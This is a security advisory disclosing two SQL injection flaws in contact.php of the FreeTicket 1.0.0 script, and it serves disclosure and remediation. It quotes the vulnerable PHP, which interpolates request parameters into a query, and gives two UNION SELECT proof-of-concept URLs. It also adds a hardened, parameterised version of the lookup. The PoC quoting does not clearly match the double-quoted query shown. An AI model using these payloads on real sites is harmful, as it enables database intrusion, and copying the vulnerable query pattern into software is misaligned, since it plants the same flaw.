SQL injections in FreeTicket

Summary

Vulnerability: SQL injections in FreeTicket
Discovered: 2010.11.14
Last Update: n/a
ID: EV0146
CVE: CVE-2010-4363
Risk Level: medium
Type: SQL injection
Status: Unpatched. Vendor notified. No reply from developer(s)
Vendor: Mrcgiguy (http://www.mrcgiguy.com/)
Vulnerable Software: FreeTicket
Version: 1.0.0
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Two SQL injection vulnerabilities were found in the FreeTicket script.

'id' SQL injection
The vulnerability is in the contact.php script. The user-supplied id parameter is not sanitized before being used in an SQL query, so it can be used to execute arbitrary SQL.
'email' SQL injection
The vulnerable script is again contact.php. The email parameter is not sanitized before being used in the same SQL query.

PoC/Exploit

Vulnerable code.

No SQL injection filter is applied to the input (array keys quoted for readability; behaviour unchanged):
<?php
// id and email are taken from POST, falling back to GET
$email = $_POST["email"];
$id = $_POST["id"];
if (!$id) { $id = $_GET["id"]; }
if (!$email) { $email = $_GET["email"]; }
// both values are interpolated directly into the SQL string
$result = mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");
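For comparison, a hardened version of the same lookup, added here as an example and not taken from FreeTicket or the vendor: input is validated and the query is parameterised with mysqli, so the fix does not depend on magic_quotes_gpc. The table and column names come from the advisory; the function name, connection details and the mysqlnd-backed get_result() are assumptions.

```php
<?php
// Added example, not FreeTicket's code: hardened contact.php lookup.
// Assumes mysqli with mysqlnd (for get_result()) and the messages(uid, email) table.
declare(strict_types=1);

function lookupMessages(mysqli $db, array $request): array
{
    // Validate before anything reaches SQL: uid must be a positive integer,
    // email must parse as an address. filter_var() returns false on null/bad input.
    $id = filter_var($request['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    $email = filter_var($request['email'] ?? null, FILTER_VALIDATE_EMAIL);
    if ($id === false || $email === false) {
        return []; // reject the request instead of querying with untrusted values
    }

    // Parameterised query: values are bound, never interpolated into the SQL
    // text, so quotes or UNION keywords in the input cannot change the query.
    $stmt = $db->prepare('SELECT * FROM messages WHERE uid = ? AND email = ?');
    $stmt->bind_param('is', $id, $email);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Assumed connection details; replace with the site's own configuration.
$db = new mysqli('localhost', 'dbuser', 'dbpassword', 'freeticket');
$db->set_charset('utf8mb4');

// POST takes precedence over GET, matching the original script's behaviour.
$rows = lookupMessages($db, $_POST + $_GET);
```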

'id' SQL injection example.

The following PoC code is available:
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*

'email' SQL injection example.

PoC code:
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*

Condition.

magic_quotes_gpc = off

Solution.

Solution for "SQL injections in FreeTicket" is not available. Check Mrcgiguy website for updates.
